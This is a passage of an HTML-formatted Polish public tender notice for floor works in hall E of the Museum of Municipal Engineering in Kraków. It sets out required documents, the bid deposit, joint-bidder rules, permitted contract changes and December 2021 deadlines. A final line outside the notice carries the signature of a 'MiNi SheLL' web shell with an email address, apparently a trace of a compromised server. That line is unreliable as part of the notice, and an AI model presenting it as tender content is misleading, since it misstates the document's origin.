z w budynku o wartości nie mniejszej niż 400 000,00 zł brutto <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">6.1.5.1. SWZ w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w<br/>pkt 5.2. SWZ odpowiednio:<br/>a) samego Wykonawcy lub każdego z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia,<br/>b) podmiotu/-ów, na którego/-ych zdolnościach technicznych lub zawodowych polega Wykonawca w<br/>celu potwierdzenia spełniania warunków udziału w postępowaniu – jeżeli dotyczy.<br/>- sporządzone wg. wzoru w Załączniku nr 8 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty oraz podmiotów, na rzecz których roboty te zostały wykonane, sporządzony<br/>wg wzoru stanowiącego załącznik nr 3 do SWZ, oraz z załączeniem dowodów określających, czy te<br/>roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – oświadczenie Wykonawcy, na potwierdzenie spełniania warunku posiadania<br/>doświadczenia, o którym mowa w pkt 5.1. SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz Oferty, według wzoru stanowiącego Zał. nr 1 do SWZ, wypełniony i podpisany<br/>przez osoby umocowane należycie do reprezentowania Wykonawcy. 2. Wraz z ofertą<br/>Wykonawca składa:1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że<br/>Wykonawca w Formularzu Oferty wskaże dane umożliwiające dostęp do tych dokumentów<br/>samodzielnie przez Zamawiającego, poprzez bezpłatne i ogólnodostępne bazy danych; 2)<br/>pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, jeżeli w jego imieniu działa osoba, której umocowanie do reprezentowania nie<br/>wynika z dokumentów wymienionych w pkt 1) powyżej; Opisane powyżej zasady stosuje się<br/>odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o<br/>udzielenie niniejszego zamówienia oraz do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby.3) Zobowiązanie podmiotu udostępniającego zasoby do oddania do<br/>dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia, lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów, jako dowód polegania na zdolnościach<br/>technicznych lub zawodowych tego podmiotu, w odniesieniu do warunków udziału w<br/>postępowaniu, o których mowa w pkt. 5.1. SWZ – jeżeli dotyczy4) Oświadczenie, z którego<br/>wynika, które usługi wykonają poszczególni Wykonawcy – przy czym obowiązek ten dotyczy<br/>wyłącznie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 117<br/>ust. 4 ustawy. 5) W celu wstępnego potwierdzenia, że Wykonawca nie podlega wykluczeniu<br/>oraz spełnia warunki udziału w postępowaniu, zgodnie z art. 125 ust. 1 i ust. 5 ustawy, składa on<br/>odrębne następujące oświadczenia: a) o niepodleganiu wykluczeniu z postępowania oraz b) o<br/>spełnianiu warunków udziału w postępowaniu, odpowiednio: i. samego Wykonawcy lub każdego<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia; ii. podmiotu/-ów, na<br/>którego/-ych zdolnościach technicznych lub zawodowych polega Wykonawca w celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu – jeżeli dotyczy, według wzorów<br/>zaproponowanych odpowiednio w formularzach A, B, C i D zał. nr 2 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium w wysokości 10 000,00PLN.<br/>2.	Wadium może być wnoszone:<br/>1)	w pieniądzu – wpłacane przelewem na rachunek Zamawiającego w Banku PKO Bank Polski S.A. nr: 50 1020 2892 0000 5002 0642 2507 z dopiskiem „Wadium - Wykonanie robót budowlanych polegających na dostosowaniu posadzki w hali E do pełnienia funkcji sali wystawienniczej dla ekspozycji stałej w siedzibie Muzeum Inżynierii Miejskiej przy ul. św. Wawrzyńca 15 w Krakowie” - tak, aby przed upływem terminu składania ofert wadium znajdowało się na ww. rachunku.(UWAGA: W przypadku wnoszenia wadium na rzecz Wykonawcy przez inny podmiot, w tytule przelewu należy wyraźnie wskazać na rzecz jakiego Wykonawcy wnoszone jest wadium);<br/>2)	w gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2020 r. poz. 299) – w oryginale, wnoszone, przed upływem terminu składania ofert w postaci elektronicznej – opatrzone wyłącznie kwalifikowanym podpisem elektronicznym osób uprawnionych do reprezentowania gwaranta lub poręczyciela. Treść dokumentu nie może zawierać postanowień o jego automatycznym wygaśnięciu w przypadku zwrotu do wystawcy. Wadium w postaci elektronicznej musi być przesłane na Elektroniczną Skrzynkę Podawczą e-PUAP Zamawiającego wskazaną w pkt 1 SWZ. <br/>UWAGA! Skan dokumentu wystawionego w postaci papierowej, następnie opatrzony kwalifikowanym podpisem elektronicznym nie ma znamion oryginału (wyrok z 11 grudnia 2018 r. Krajowej Izby Odwoławczej Sygn. akt: KIO 2426/18).<br/>3)	Dopuszczalne jest złożenie wadium w więcej niż jednej formie.<br/>3.	Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:<br/>3.1.	musi być wystawione na Muzeum Inżynierii Miejskiej w Krakowie ul. Św. Wawrzyńca 15, 31-060 Kraków;<br/>3.2.	musi zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 98 ust. 6 ustawy Pzp;<br/>3.3.	okres ważności wadium nie może być krótszy niż okres związania ofertą.<br/>4.	Zamawiający zwróci wadium w sposób odpowiadający formie wnoszenia w przypadkach wymienionych w art. 98 ust. 1 i 2 ustawy Pzp. W przypadku wadium wniesionego w pieniądzu Zamawiający zwróci kwotę wadium wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszoną o koszty prowadzenia rachunku bankowego oraz o prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium. <br/>5.	Zamawiający zwraca wadium w terminach określonych w art. 98 ust. 1 i 2 ustawy. <br/>6.	Zamawiający zatrzyma wadium w wypadku, gdy zajdzie jedna z okoliczności wymienionych w art. 98 ust. 6 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego (np. członkowie<br/>konsorcjum, wspólnicy spółki cywilnej), zgodnie z art. 58 ust. 2 ustawy, są zobowiązani<br/>ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich<br/>w postępowaniu i do zawarcia umowy, i przedstawić stosowne dokumenty (pełnomocnictwa) w<br/>składanej ofercie.<br/>2. Ponadto Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego<br/>składają:<br/>2.1. każdy z osobna dotyczące ich dokumenty wskazane odpowiednio w pkt 6.1.5.1., a<br/>ponadto – na wezwanie Zamawiającego – także dokument opisany w pkt 6.2.1 SWZ dot.<br/>każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2.2. jeżeli dotyczy - dokumenty wskazane w pkt 6.1.3., 6.1.4., 6.1.5.1 dot. podmiotu<br/>udostępniającego zasoby, a ponadto – na wezwanie Zamawiającego – także 6.2.1. SWZ dot.<br/>podmiotu udostępniającego zasoby;<br/>2.3. dokumenty, o których mowa w pkt 6.1.1. i 6.1.2. SWZ (w tym dot. podmiotu<br/>udostępniającego zasoby – jeżeli dotyczy);<br/>2.4. ci z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, którzy spełniają<br/>dokumenty, o których mowa w pkt 6.1.5.2 SWZ;<br/>2.5. a na wezwanie Zamawiającego, ci z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, którzy spełniają warunek, na potwierdzenie którego wymagany jest dany dokument,<br/>także dokument wskazany w pkt 6.2.2. SWZ.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. członkowie konsorcjum)<br/>ponoszą, zgodnie z art. 445 ust. 1 ustawy, solidarną odpowiedzialność za wykonanie umowy i<br/>wniesienie zabezpieczenia należytego wykonania umowy – jeżeli dotyczy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wprowadzenie zmian treści umowy wymaga sporządzenia pod rygorem nieważności formy pisemnej aneksu, z zastrzeżeniem art. 455 ust. 1 ustawy Prawo zamówień publicznych.<br/>2.	Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień umowy w następujących przypadkach:<br/>1)	wysokości wynagrodzenia w przypadku: <br/>a.	zmiany stawki podatku VAT, w odniesieniu do tej części wynagrodzenia, której zmiana dotyczy, <br/>b.	ograniczenia zakresu prac objętych niniejszą Umową w razie stwierdzenia braku konieczności wykonywania części zamówienia, ujętych w dokumentacji i SWZ, <br/>c.	zmiany zakresu prac objętych niniejszą Umową w wyniku zmian opisanych w pkt. 3); <br/>2)	terminu realizacji przedmiotu zamówienia, zakresu świadczenia, sposobu realizacji umowy i wynagrodzenia gdy są one spowodowane: <br/>a.	siłą wyższą – rozumianą jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w części lub całości, a w szczególności epidemią COVID-19 stwierdzoną przez uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym, <br/>b.	zmiany zakresu prac objętych niniejszą umową w przypadku zastosowania zmian opisanych w pkt. 3), <br/>c.	następstwem okoliczności leżących po stronie Zamawiającego, takich jak: utrudnienia, zawieszenia robót lub przeszkodami dającymi się przypisać Zamawiającemu, <br/>d.	koniecznością wprowadzenia zmian na etapie wykonawstwa robót z przyczyn niezależnych od obu stron związanymi z aktualizacją rozwiązań projektowych z uwagi na postęp technologiczny, <br/>e.	koniecznością wykonania robót dodatkowych skutkujących zmianą zakresu robót i/lub przedłużenia terminu realizacji zamówienia. Roboty objęte zamówieniem dodatkowym będą zlecane po zawarciu z Wykonawcą stosownego aneksu. Udzielenie zamówienia dodatkowego musi być poprzedzone sporządzeniem protokołu konieczności,<br/>f.	następstwem działania organów administracji lub innych podmiotów, związanych z przekroczeniem obowiązujących terminów wydawania lub odmowy wydania decyzji, zezwoleń, uzgodnień, <br/>g.	następstwem wprowadzania zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia, <br/>h.	wyjątkowo niekorzystne warunki atmosferyczne, długotrwałe deszcze, śnieg trwające pow. 7 dni lub mróz uniemożliwiający wykonanie robót zgodnie ze sztuką;<br/>i.	konieczności wykonania robót zamiennych. Roboty zamienne:<br/>i.	polegają na tym, że Wykonawca zobowiązuje się do wykonania zamówienia podstawowego w sposób odmienny od określonego w umowie<br/>ii.	nie mogą spowodować zwiększenia wynagrodzenia Wykonawcy,<br/>iii.	konieczność wykonania robót zamiennych zachodzi między innymi w sytuacji, gdy: <br/>•	materiały budowlane, osprzęt lub urządzenia przewidziane do wykonania zamówienia, wskazane w SWZ i załącznikach, nie mogą być użyte przy realizacji przedmiotu zamówienia z powodu zaprzestania produkcji, wycofania z rynku lub zastąpienia innymi lub lepszymi<br/>•	w trakcie wykonania Przedmiotu zamówienia nastąpiła zmiana przepisów prawa budowlanego,<br/>•	w czasie realizacji budowy zmienią się warunki techniczne wykonania przedmiotu zamówienia (np. Polska Norma), <br/>•	w trakcie realizacji Przedmiotu zamówienia wystąpiła konieczność zmiany technologii wykonania robót<br/>j.	niezależnymi od Wykonawcy opóźnieniami w dostawach sprzętu lub materiałów z powodów zależnych od Producentów lub dostawców sprzętu i materiałów <br/>k.	zmianą umowy na podstawie art. 455 ust. 2 ustawy pzp<br/>Zmiana terminu realizacji przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu, o czas niezbędny do wykonywania przedmiotu zamówienia, w sposób należyty, nie dłużej jednak, niż o czas trwania okoliczności wymienionych w ust. 1 powyżej.<br/>c.d. zawiera par. 16 wzoru umowy - załącznik nr 4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi załącznikami za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-17 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> c.d. informacji z pkt 3.6 ogłoszenia<br/>10.Za datę przekazania oferty, dokumentów, informacji i oświadczeń oraz ich cyfrowych<br/>odwzorowań przyjmuje się datę ich przekazania na ePUAP lub datę i godzinę serwera<br/>pocztowego Zamawiającego.<br/>11. Formaty danych wymagane do sporządzania i przekazywania dokumentów i informacji w<br/>postępowaniu określa § 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie. Zamawiający wskazuje jednak, że wśród<br/>dopuszczalnych i ogólnie dostępnych formatów znajdują się m.in.: .txt, .rtf, .pdf, .doc, .docx,<br/>.odt., ze szczególnym wskazaniem na .pdf.<br/>12. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej<br/>może zawsze dokonać notariusz. Ponadto szczegółowe zasady poświadczania różnych<br/>kategorii dokumentów opisuje § 6 ust. 3 oraz § 7 ust. 3 Rozporządzenia przywołanego w pkt 11<br/>powyżej.<br/>13. W Formularzu oferty wartości liczbowe należy wpisywać w każdej pozycji wyłącznie cyframi,<br/>a w miejscach gdzie jest to wyraźnie wskazane także słownie (nie stosuje się wyrażenia „jw.” i<br/>równoważnych).<br/>14. Podmiotowe środki dowodowe, przedmiotowe środki dowodowe oraz inne dokumenty lub<br/>oświadczenia, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język<br/>polski.<br/>15. Zamawiający zastrzega sobie ponadto możliwość żądania, aby w przypadku wskazania<br/>przez Wykonawcę dostępności podmiotowych środków dowodowych lub dokumentów, o których<br/>mowa w pkt 6.1.2. lit. a SWZ, pod określonymi adresami internetowymi ogólnodostępnych i<br/>bezpłatnych baz danych, przedstawił on tłumaczenia na język polski pobranych samodzielnie<br/>przez Zamawiającego podmiotowych środków dowodowych lub dokumentów.<br/>16. W zakresie nieuregulowanym ustawą lub niniejszą SWZ do podmiotowych środków<br/>dowodowych, oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu<br/>zastosowanie mają w szczególności przepisy rozporządzenia przywołanego w pkt 8.4. SWZ<br/>powyżej oraz rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich<br/>może żądać zamawiający od wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com